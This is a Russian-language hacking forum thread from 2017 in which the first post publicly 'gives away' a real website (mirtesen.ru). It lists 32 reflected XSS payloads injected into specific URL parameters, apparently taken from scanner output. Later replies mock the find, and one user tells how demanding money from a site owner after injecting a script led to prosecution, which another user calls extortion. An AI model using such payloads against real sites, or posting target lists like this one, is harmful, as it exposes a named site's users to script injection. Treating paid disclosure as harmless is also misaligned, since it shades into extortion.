Нашел уязвимый сайт, отдаю.

Discussion in 'Песочница' started by couldnot332, 22 Jun 2017.

  1. couldnot332

    couldnot332 New Member

    Joined:
    18 May 2017
    Messages:
    6
    Likes Received:
    1
    Reputations:
    0
    Уязвимости:
    | XSS:
    | [+] Vul[1] [XSS] http://mirtesen.ru/market/dom-i-dacha/tekstil/podushki?vendor="><script>alert('XSS')</script>
    | [+] Vul[2] [XSS] http://mirtesen.ru/market/dom-i-dacha/tekstil/podushki?vendor=">'';!--"<XSS>=&{()}
    | [+] Vul[3] [XSS] http://mirtesen.ru/market/dom-i-dacha/tekstil/podushki?vendor="><IMG SRC="javascript:alert('XSS');">
    | [+] Vul[4] [XSS] http://mirtesen.ru/market/dom-i-dacha/tekstil/podushki?vendor="><LINK REL="stylesheet" HREF="javascript:alert('XSS');">
    | [+] Vul[5] [XSS] http://mirtesen.ru/market/dom-i-dacha/tekstil/podushki?vendor="><META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">
    | [+] Vul[6] [XSS] http://mirtesen.ru/market/dom-i-dacha/tekstil/podushki?vendor="><DIV STYLE="background-image: url(javascript:alert('XSS'))">
    | [+] Vul[7] [XSS] http://mirtesen.ru/market/dom-i-dacha/tekstil/podushki?vendor="><body onload="javascript:alert('XSS')"></body>
    | [+] Vul[8] [XSS] http://mirtesen.ru/market/dom-i-dacha/tekstil/podushki?vendor="><table background="javascript:alert('XSS')"></table>
    | [+] Vul[9] [XSS] http://mirtesen.ru/market/dosug-i-razvlecheniya/muzykalnye-instrumenty?vendor="><script>alert('XSS')</script>
    | [+] Vul[10] [XSS] http://mirtesen.ru/market/dosug-i-razvlecheniya/muzykalnye-instrumenty?vendor=">'';!--"<XSS>=&{()}
    | [+] Vul[11] [XSS] http://mirtesen.ru/market/dosug-i-razvlecheniya/muzykalnye-instrumenty?vendor="><IMG SRC="javascript:alert('XSS');">
    | [+] Vul[12] [XSS] http://mirtesen.ru/market/dosug-i-razvlecheniya/muzykalnye-instrumenty?vendor="><LINK REL="stylesheet" HREF="javascript:alert('XSS');">
    | [+] Vul[13] [XSS] http://mirtesen.ru/market/dosug-i-razvlecheniya/muzykalnye-instrumenty?vendor="><META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">
    | [+] Vul[14] [XSS] http://mirtesen.ru/market/dosug-i-razvlecheniya/muzykalnye-instrumenty?vendor="><DIV STYLE="background-image: url(javascript:alert('XSS'))">
    | [+] Vul[15] [XSS] http://mirtesen.ru/market/dosug-i-razvlecheniya/muzykalnye-instrumenty?vendor="><body onload="javascript:alert('XSS')"></body>
    | [+] Vul[16] [XSS] http://mirtesen.ru/market/dosug-i-razvlecheniya/muzykalnye-instrumenty?vendor="><table background="javascript:alert('XSS')"></table>
    | [+] Vul[17] [XSS] http://mirtesen.ru/market/dosug-i-razvlecheniya/bilety?sort="><script>alert('XSS')</script>
    | [+] Vul[18] [XSS] http://mirtesen.ru/market/dosug-i-razvlecheniya/bilety?sort=">'';!--"<XSS>=&{()}
    | [+] Vul[19] [XSS] http://mirtesen.ru/market/dosug-i-razvlecheniya/bilety?sort="><IMG SRC="javascript:alert('XSS');">
    | [+] Vul[20] [XSS] http://mirtesen.ru/market/dosug-i-razvlecheniya/bilety?sort="><LINK REL="stylesheet" HREF="javascript:alert('XSS');">
    | [+] Vul[21] [XSS] http://mirtesen.ru/market/dosug-i-razvlecheniya/bilety?sort="><META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">
    | [+] Vul[22] [XSS] http://mirtesen.ru/market/dosug-i-razvlecheniya/bilety?sort="><DIV STYLE="background-image: url(javascript:alert('XSS'))">
    | [+] Vul[23] [XSS] http://mirtesen.ru/market/dosug-i-razvlecheniya/bilety?sort="><body onload="javascript:alert('XSS')"></body>
    | [+] Vul[24] [XSS] http://mirtesen.ru/market/dosug-i-razvlecheniya/bilety?sort="><table background="javascript:alert('XSS')"></table>
    | [+] Vul[25] [XSS] http://mirtesen.ru/market/dosug-i-razvlecheniya/muzyka?vendor="><script>alert('XSS')</script>
    | [+] Vul[26] [XSS] http://mirtesen.ru/market/dosug-i-razvlecheniya/muzyka?vendor=">'';!--"<XSS>=&{()}
    | [+] Vul[27] [XSS] http://mirtesen.ru/market/dosug-i-razvlecheniya/muzyka?vendor="><IMG SRC="javascript:alert('XSS');">
    | [+] Vul[28] [XSS] http://mirtesen.ru/market/dosug-i-razvlecheniya/muzyka?vendor="><LINK REL="stylesheet" HREF="javascript:alert('XSS');">
    | [+] Vul[29] [XSS] http://mirtesen.ru/market/dosug-i-razvlecheniya/muzyka?vendor="><META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">
    | [+] Vul[30] [XSS] http://mirtesen.ru/market/dosug-i-razvlecheniya/muzyka?vendor="><DIV STYLE="background-image: url(javascript:alert('XSS'))">
    | [+] Vul[31] [XSS] http://mirtesen.ru/market/dosug-i-razvlecheniya/muzyka?vendor="><body onload="javascript:alert('XSS')"></body>
    | [+] Vul[32] [XSS] http://mirtesen.ru/market/dosug-i-razvlecheniya/muzyka?vendor="><table background="javascript:alert('XSS')"></table>
     
    Печа likes this.
  2. h3xp1017

    h3xp1017 Member

    Joined:
    28 Oct 2015
    Messages:
    84
    Likes Received:
    25
    Reputations:
    1
  3. zer0_igL

    zer0_igL Well-Known Member

    Joined:
    9 Jan 2017
    Messages:
    298
    Likes Received:
    486
    Reputations:
    4
    Хрень, нечего интересного!!!!! Постоянно перекидывает на search
     
  4. SooLFaa

    SooLFaa Members of Antichat

    Joined:
    17 Mar 2014
    Messages:
    530
    Likes Received:
    499
    Reputations:
    154
    И зачем для этого создавать отдельную тему? Есть соответствующая тема, для такой мелочевки, другое дело если бы ты известный ресурс какой слил, а тут всего лишь ХСС'ки
     
    _________________________
    Octavian likes this.
  5. h3xp1017

    h3xp1017 Member

    Joined:
    28 Oct 2015
    Messages:
    84
    Likes Received:
    25
    Reputations:
    1
    при том найденные сканером
     
  6. JustBE

    JustBE New Member

    Joined:
    24 Jun 2017
    Messages:
    6
    Likes Received:
    0
    Reputations:
    0
    полная шляпа, перекидывает на search
     
  7. Coost

    Coost Active Member

    Joined:
    6 Jul 2017
    Messages:
    221
    Likes Received:
    263
    Reputations:
    5
    Меня так чуть не посадили за взлом сайта городской газеты с активной хсс
     
  8. zer0_igL

    zer0_igL Well-Known Member

    Joined:
    9 Jan 2017
    Messages:
    298
    Likes Received:
    486
    Reputations:
    4
    Анонимности тебе не занимать)))
     
  9. Coost

    Coost Active Member

    Joined:
    6 Jul 2017
    Messages:
    221
    Likes Received:
    263
    Reputations:
    5
    Да я и сайту не врядил. Вставил безобидный алерт скрипт, связался с админом, предложил показать дырку за копейки, он согласился. Дал ему номер вебмани, он написал заявление в мусарню. Менты подали запрос в вебмани и получили мои данные (работали тк заяву написали журналисты, а так обычно им пох).

    Ну и потом комп на экспертизу (благо, что ничего кроме этой формы не копали) и суд по статье 361 УК Украины.

    Вот и делай людям добро. Пробили только по кошельку, анонимности хватало.
     
  10. zer0_igL

    zer0_igL Well-Known Member

    Joined:
    9 Jan 2017
    Messages:
    298
    Likes Received:
    486
    Reputations:
    4
    Админ пидаром оказало, краснопузый мудозвон...
     
    Trilgon likes this.
  11. RWD

    RWD Member

    Joined:
    25 Apr 2013
    Messages:
    157
    Likes Received:
    41
    Reputations:
    2
    Это уже вымогательство, владельцы ресурса сами должны принимать решение о выплатах за сообщения об уязвимостях, а если уже пришло в голову подобным бредом заниматься, то хотя бы деньги на биткоин принимайте.


    вебмани в 2к17
     
    #11 RWD, 8 Jul 2017
    Last edited: 8 Jul 2017
  12. Coost

    Coost Active Member

    Joined:
    6 Jul 2017
    Messages:
    221
    Likes Received:
    263
    Reputations:
    5
    А кто тебе сказал, что это было в 2к17? Тогда биткоинов ещё небыло.

    Это не вымогательство. Вымогательство — это если бы я блокировал сайт через такую дырку и просил деньги за разблокировку. А ведь такая возможность была.
     
Loading...
Similar Threads - Нашел уязвимый сайт
  1. zase
    Replies:
    1
    Views:
    3,412
  2. Shadows_God
    Replies:
    14
    Views:
    7,583